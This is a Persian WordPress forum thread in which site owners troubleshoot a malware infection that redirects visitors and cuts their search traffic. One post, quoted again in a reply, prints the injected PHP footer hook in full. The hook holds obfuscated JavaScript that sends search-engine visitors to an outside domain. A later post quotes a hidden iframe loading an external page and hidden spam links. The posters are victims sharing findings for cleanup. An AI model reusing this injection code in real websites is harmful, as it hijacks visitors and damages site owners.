انجمن


ویروسی شدن سایت  (۱۷ نوشته)

  • hosein_ras

    آفلاین
    عضو
    تعداد نوشته‌ها: ۷
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۰۰:۴۷

    سلام دوستان
    من یه مشکلی دچارش شدم که باعث شده ورودی هام از گوگل تو دو روز اخیر یک چهارم بشه
    دوستان کمک کنند اگه راه حلی به ذهنشون می رسه
    وقتی با نرم افزار Xenu صفحات داخلیم رو چک می کنم ،نشون می ده که ریدایرکت صورت می گیره
    ادرس سایتم هست: http://funfars.ir
    کمک کنید لطفا :(

  • milad200

    آفلاین
    عضو
    تعداد نوشته‌ها: ۵۸۵
    تشکر شده: ۳۳۴ بار
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۰۱:۰۹

    سلام
    به وردپرس خوش آمدید
    این صفحه را ببینید و کد معرفی شده را از functions.php پاک بفرمایید
    http://forum.wp-persian.com/topic/20378

  • hosein_ras

    آفلاین
    عضو
    تعداد نوشته‌ها: ۷
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۰۱:۱۴

    milad200 گفت:
    سلام
    به وردپرس خوش آمدید
    این صفحه را ببینید و کد معرفی شده را از functions.php پاک بفرمایید
    http://forum.wp-persian.com/topic/20378

    این صفحه که لینک همین صفحه است
    امکانش هست دوباره لینک رو بدید؟

  • milad200

    آفلاین
    عضو
    تعداد نوشته‌ها: ۵۸۵
    تشکر شده: ۳۳۴ بار
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۰۱:۵۶

    ببخشید اشتباه کردیم
    این لینک
    http://forum.wp-persian.com/topic/19799
    موفق باشید

  • hosein_ras

    آفلاین
    عضو
    تعداد نوشته‌ها: ۷
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۱۰:۴۶

    بررسی کردم
    تو Function همچین کدی نبود!
    دوستان راهنمایی کنند
    ورودی 2000تاییم از گوگل شده 100 تا!!

  • ثاني عشر

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۲
    تشکر شده: ۷۱ بار
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۱۱:۰۵

    سلام دوستان
    من هم از ديروز همين مشكل رو دارم؛ ديروز سايتم بعد از چند ثانيه وارد اين آدرس مي‌شد:
    http://ultraprivat.ru/index.php?ref=24
    امروز وارد اين آدرس:
    http://ultraprivat.ru/codes/directlink.php?id=11
    در ضمن اين كد، توي فايل functions.php من هم وجود نداشت

    <?php
    add_action('get_footer', 'add_sscounter');
    	function add_sscounter(){
    		echo '<!--scounter-->';
    		if(function_exists('is_user_logged_in')){
    			if(time()%2 == 0 && !is_user_logged_in()){
    				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

    تنها كاري كه من ديروز انجام دادم، نصب سه تا افزونه كش بوده! به نام:
    askapache-crazy-cache.2.0 و db-cache-reloaded-fix.2.2.4 و hyper-cache.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    hosein_ras
  • hosein_ras

    آفلاین
    عضو
    تعداد نوشته‌ها: ۷
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۱۱:۳۳

    thaniashar گفت:
    سلام دوستان
    من هم از ديروز همين مشكل رو دارم؛ ديروز سايتم بعد از چند ثانيه وارد اين آدرس مي‌شد:
    http://ultraprivat.ru/index.php?ref=24
    امروز وارد اين آدرس:
    http://ultraprivat.ru/codes/directlink.php?id=11
    در ضمن اين كد، توي فايل functions.php من هم وجود نداشت

    <?php
    add_action('get_footer', 'add_sscounter');
    	function add_sscounter(){
    		echo '<!--scounter-->';
    		if(function_exists('is_user_logged_in')){
    			if(time()%2 == 0 && !is_user_logged_in()){
    				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

    تنها كاري كه من ديروز انجام دادم، نصب سه تا افزونه كش بوده! به نام:
    askapache-crazy-cache.2.0 و db-cache-reloaded-fix.2.2.4 و hyper-cache.

    این افزونه ها کارشون چیه؟
    من این افزونه ها رو نصب نکرده بودم

  • turkm4hdi

    آفلاین
    عضو
    تعداد نوشته‌ها: ۴۹
    تشکر شده: ۴۷ بار
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۱۳:۲۵

    askapache-crazy-cache.2.0 و db-cache-reloaded-fix.2.2.4 و hyper-cache.
    اینا افزونه کش هستن.

    من که هرچی گشتم سایتتون درست بود و هیچ جای دیگه ردایرکت نمیشه.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    ثاني عشر
  • ثاني عشر

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۲
    تشکر شده: ۷۱ بار
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۱۴:۰۰

    turkm4hdi گفت:
    من که هرچی گشتم سایتتون درست بود و هیچ جای دیگه ردایرکت نمیشه.

    شما به آدرس http://ketabmobile.com رفتيد؟!!!
    چطور ممكنه؟ من تا وارد ميشم، به پنج ثانيه نمي‌كشه كه ردایرکت ميشه؛ آمار سايت هم به نصف رسيده
    يعني ممكنه فقط براي بعضي كاربران مشكل داشته باشه؟ آخه چطوري؟ بايد چيكارش كنم؟! ممنون

  • master AK

    آفلاین
    عضو
    تعداد نوشته‌ها: ۴۰
    تشکر شده: ۲۴ بار
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۱۴:۵۵

    thaniashar گفت:

    شما به آدرس http://ketabmobile.com رفتيد؟!!!
    چطور ممكنه؟ من تا وارد ميشم، به پنج ثانيه نمي‌كشه كه ردایرکت ميشه؛ آمار سايت هم به نصف رسيده
    يعني ممكنه فقط براي بعضي كاربران مشكل داشته باشه؟ آخه چطوري؟ بايد چيكارش كنم؟! ممنون

    سایت شما مشکلی نداره
    http://ketabmobile.com/
    بدون مشکل لود میشه و بعد از 10 دقیقه ری دایرکت نشد

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    ثاني عشر - turkm4hdi - Saeed Fard
  • hosein_ras

    آفلاین
    عضو
    تعداد نوشته‌ها: ۷
    # نوشته شده: ۷ سال پیش
    ۲۲ اسفند ۱۳۹۰ - ۲۰:۰۱

    می دونم اما وقتی با نرم افزار xenu سرچ می کنم اینجوری میشه

  • hosein_ras

    آفلاین
    عضو
    تعداد نوشته‌ها: ۷
    # نوشته شده: ۷ سال پیش
    ۲۳ اسفند ۱۳۹۰ - ۰۹:۵۹

    فکر دی کردم تو انجمن وردپرس می تونند مشکلم رو حداقل شناسایی کنند.

  • Saeed Fard

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۹۸۲
    تشکر شده: ۱۶۱۵ بار
    # نوشته شده: ۷ سال پیش
    ۲۵ اسفند ۱۳۹۰ - ۱۳:۲۱

    درود ;

    شما به آدرس http://ketabmobile.com رفتيد؟!!!
    چطور ممكنه؟ من تا وارد ميشم، به پنج ثانيه نمي‌كشه كه ردایرکت ميشه؛ آمار سايت هم به نصف رسيده
    يعني ممكنه فقط براي بعضي كاربران مشكل داشته باشه؟ آخه چطوري؟ بايد چيكارش كنم؟! ممنون

    درسته دوست عزیز ، مثل اینکه این سایت با متا تگ دایرکت میشه ، با قالب پیشفرض وردپرس تست کنید ،، اگه مشکل برطرف نشد ، وردپرس رو از نو بارگذاری کنید ،، اگر هم مشکل از قالب بود فایل های قالب رو چک کنید و اسکریپت مشکوکی وجود داشت پاک کنید ..

    می دونم اما وقتی با نرم افزار xenu سرچ می کنم اینجوری میشه

    دوست من سایت شما مشکلی نداره ، ولی برای اطمینانتون شما هم همین کاری که گفتم رو انجام بدید ..

    موفق باشید ../.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    ثاني عشر
  • ثاني عشر

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۲
    تشکر شده: ۷۱ بار
    # نوشته شده: ۷ سال پیش
    ۲۶ اسفند ۱۳۹۰ - ۰۹:۰۹

    saeidfard گفت:
    درود ;
    درسته دوست عزیز ، مثل اینکه این سایت با متا تگ دایرکت میشه ، با قالب پیشفرض وردپرس تست کنید ،، اگه مشکل برطرف نشد ، وردپرس رو از نو بارگذاری کنید ،، اگر هم مشکل از قالب بود فایل های قالب رو چک کنید و اسکریپت مشکوکی وجود داشت پاک کنید ..
    موفق باشید ../.

    با سلام و تشکر
    هاستم میگه مشکل از نرم افزارهای ftp هست، درسته؟
    من با Anti-Malware هم سیستم رو ویروس کسی‌ کردم ، ویندوز رو هم عوض کردم، هنوز مشکل داره!!
    می‌شه منظورتون از اسکریپت مشکوک رو توضیح بدید

  • ثاني عشر

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۲
    تشکر شده: ۷۱ بار
    # نوشته شده: ۷ سال پیش
    ۲۷ اسفند ۱۳۹۰ - ۰۰:۳۶

    دوستان, مشکلم حل شد؛ مینویسم تا تنها خوری نکرده باشم :-)
    بعد از ساعتها گشتن واژه ویروس (+) و تروجان (+) توی انجمن و...؛ و نصب آنتی ویروس وردپرس (+) و آنتی بدافزار وردپرس (+) و ثبت سایت در وبمستر گوگل (+) به نتیجه ای نرسیدم لذا همه فایل و فولدرهای سایتم رو داخل کامپیوتر آپلود کردم » اسکن کردم دیدم ویروس نداره! » بعد از بیش از 10 ساعت ور رفتن مداوم, یه دفعه به ذهنم خورد: درسته که ویروس کش شید آپدیت شده رو دارم و غمی ندارم چون قدرتش رو از (نود32 و آویرا) میگیره!! ولی حالا یک نود32 هم نصب کنم » آره تا نود32 رو نصب و آپدیتش کردم؛ فایل ایندکس روت رو ویروسی شناخت و من هم اینکس بسته ی اصلی وردپرس رو جایگزین کردم؛ اینطور بود که سایتم جون گرفت؛ البته فعلا! نکته اخلاقی: «دیگر به سراغ sheed نخواهم رفت»

    توی یک سایتم, بعد از پایان یافتن کدهای ایندکس, کدهایی رو نوشته بود که با این شروع میشد:
    <iframe name="SagUTeXYne" src="http://lscab.ru/templates/lscab/kx/index.php?out=1331381254" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe><script type="text/javascript"> .....
    توی سایت دیگم هم بعد از کدهای ایندکس, با اینا شروع میشد:
    <div style="display:none"><a href="http://www.aydoganweb.com" title="Evden Eve Nakliyat">Evden Eve Nakliyat</a> و 36تا سایت دیگه ...
    اگه شما هم با مثل این کدها برخوردید, سریع پاکشون کنین. برای همه تون سایت خوب, پرمحتوا, بی دردسر و بدون ویروسی رو آرزومندم

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    NESTED
  • ثاني عشر

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۲
    تشکر شده: ۷۱ بار
    # نوشته شده: ۷ سال پیش
    ۲۷ اسفند ۱۳۹۰ - ۲۳:۵۵

    سلام
    به اين صفحه برخورد كردم؛ گفتم شايد براي بقيه هم مفيد باشه
    http://www.stopbadware.org/home/security#preventing

    دوستان كد وبمستر گوگل، دقيقا بايد توي كدوم فايل قرار بگيره؛ براي اين سايت جديدم كه مي‌خوام بذارم، قبول نمي‌كنه!! نمي‌دونم قبلا توي كدوم فايل گذاشتم!! ممنون

  • hosein_ras

    آفلاین
    عضو
    تعداد نوشته‌ها: ۷
    # نوشته شده: ۷ سال پیش
    ۶ فروردین ۱۳۹۱ - ۲۲:۰۶

    thaniashar گفت:
    سلام
    به اين صفحه برخورد كردم؛ گفتم شايد براي بقيه هم مفيد باشه
    http://www.stopbadware.org/home/security#preventing

    دوستان كد وبمستر گوگل، دقيقا بايد توي كدوم فايل قرار بگيره؛ براي اين سايت جديدم كه مي‌خوام بذارم، قبول نمي‌كنه!! نمي‌دونم قبلا توي كدوم فايل گذاشتم!! ممنون

    آقا اینجا تاپیک من هستا
    صرفا جخت یادآوری گفتم

درباره‌ی این موضوع



برچسب‌ها

هیچ برچسبی نیست.